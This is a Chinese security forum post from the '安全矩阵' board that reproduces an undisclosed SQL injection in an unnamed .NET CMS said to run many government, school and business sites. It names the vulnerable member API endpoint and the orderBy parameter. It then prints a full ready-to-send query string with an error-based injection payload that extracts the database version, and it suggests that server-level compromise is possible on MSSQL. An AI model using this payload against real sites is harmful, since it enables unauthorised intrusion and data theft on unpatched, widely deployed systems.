安全矩阵

 找回密码
 立即注册
搜索
查看: 1127|回复: 0

.NET 复现某CMS系统未公开SQL注入漏洞

[复制链接]

17

主题

17

帖子

63

积分

注册会员

Rank: 2

积分
63
发表于 2024-5-23 20:09:12 | 显示全部楼层 |阅读模式
本帖最后由 xcisme 于 2024-5-23 20:11 编辑

.NET 复现某CMS系统未公开SQL注入漏洞
专攻.NET安全的[url=]dotNet安全矩阵[/url]
01
应用介绍

某CMS是.NET开发的一款支持多分站、多语种,集成内容发布、信息发布、自定义表单、自定义模型、会员系统、业务管理等功能于一体的独立网站管理系统,支持MSSQL Server数据库。用户可以下载安装使用,系统于2008年正式发布,目前全国用户已经超过50万以上,被广泛用于全国各级政府、学校和企业的网站搭建,具有简单易用、强大灵活等特点。


02
漏洞复现
该系统的会员模块对用户提交的文章参数没有进行充分的过滤,导致SQL注入,如果采用的是MSSQL Server数据库,则有可能直接获取数据库服务器系统权限。
某个包含名为memberAPI接口存在注入漏洞,当请求为GET时触发该API运行,注入参数为orderBy,发送id+desc)[_rownumber],[article].[Id],[article].[ColumnId],[article].[State],[article].[IsGood],[article].[IsHot],[article].[IsTop],[article].[IsOnline],[article].[IsExpire],[article].[PublishFrom],[article].[HasThumbnail],[article].[IsSubColumnData],[article].[Uid],[article].[Username],[article].[Clicks],[article].[Ip],[article].[Title],[article].[Thedate]from[article])[_newtable]where[_newtable].[_rownumber]+between+1+and+10and+1=(select+@@version)--,可以报错注入当前的数据库版本,具体如下Payload
?table=article&state=1&columnId=4239&searchAttr=&orderBy=id+desc)[_rownumber],[article].[Id],[article].[ColumnId],[article].[State],[article].[IsGood],[article].[IsHot],[article].[IsTop],[article].[IsOnline],[article].[IsExpire],[article].[PublishFrom],[article].[HasThumbnail],[article].[IsSubColumnData],[article].[Uid],[article].[Username],[article].[Clicks],[article].[Ip],[article].[Title],[article].[Thedate]from[article])[_newtable]where[_newtable].[_rownumber]+between+1+and+10and+1=(select+@@version)--&searchField=thedate&searchDateRange=&searchKeyword=&PageSize=10&CurrentPage=1&PageCount=0&RecordCount=0&_=1704699710036
有关漏洞详情和具体复现的方法已发表于星球,师傅们可自行查阅资料。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 20:58 , Processed in 0.013501 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表